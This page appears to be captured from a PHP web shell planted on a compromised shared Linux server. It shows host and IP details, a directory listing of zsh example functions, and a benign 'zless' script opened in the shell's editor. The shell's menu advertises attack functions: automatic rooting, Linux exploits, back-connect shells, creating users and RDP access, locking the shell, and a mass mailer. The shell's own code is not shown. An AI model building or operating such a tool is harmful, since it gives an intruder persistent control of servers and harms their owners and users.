Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
zsh-common /
examples /
Functions /
[ HOME SHELL ]
Name
Size
Permission
Action
acx
104
B
-rw-r--r--
cat
195
B
-rw-r--r--
cx
109
B
-rw-r--r--
proto
194
B
-rw-r--r--
pushd
418
B
-rw-r--r--
randline
82
B
-rw-r--r--
yp
29
B
-rw-r--r--
yu
35
B
-rw-r--r--
zless
1.12
KB
-rw-r--r--
zls
1.64
KB
-rw-r--r--
zpgrep
377
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : zless
#!/bin/zsh -f # # zsh function script to run less on various inputs, decompressing as required. # Author: Phil Pennock. zsh-hacks@athenaeum.demon.co.uk # Modified by Bart Schaefer. # Thanks to zefram@fysh.org for a great deal of help in sorting this out, # ie wrt syntax for unsetting members of arrays and eval "$(...)" when I # asked for something better than . =(...) # # Use -zforce to pass through a display-formatting command # zless -zforce 'bzip2 -dc' foo-no-dotbz2 # zless -zforce 'od -hc' foo-binfile # # If you can understand all of this without reference to zshexpn(1) # and zshparam(1) then you either have a photographic memory or you # need to get out more. # emulate -R zsh setopt localoptions [[ $# -ge 1 ]] || return local lessopts set -A lessopts integer i=1 loi=1 while ((i <= $#)) do case $argv[i] in -zforce) argv[i,i+2]=("=($argv[i+1] \"$argv[i+2]\")"); ((++i));; -*) lessopts[loi++]=\"$argv[i]\"; argv[i]=(); continue;; *.(gz|Z)) argv[i]="=(zcat \"$argv[i]\")";; *.bz2) argv[i]="=(bzip2 -dc \"$argv[i]\")";; *.bz) argv[i]="=(bzip -dc \"$argv[i]\")";; esac ((++i)) done eval command less $lessopts $*
Close